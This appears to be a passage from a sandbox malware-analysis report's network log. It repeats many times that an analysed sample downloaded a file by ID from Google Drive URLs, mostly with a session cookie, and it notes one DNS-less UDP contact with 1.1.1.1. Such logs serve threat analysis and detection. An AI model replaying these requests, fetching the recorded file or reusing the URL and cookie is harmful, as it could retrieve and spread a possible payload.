      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache
      Source: global traffic HTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
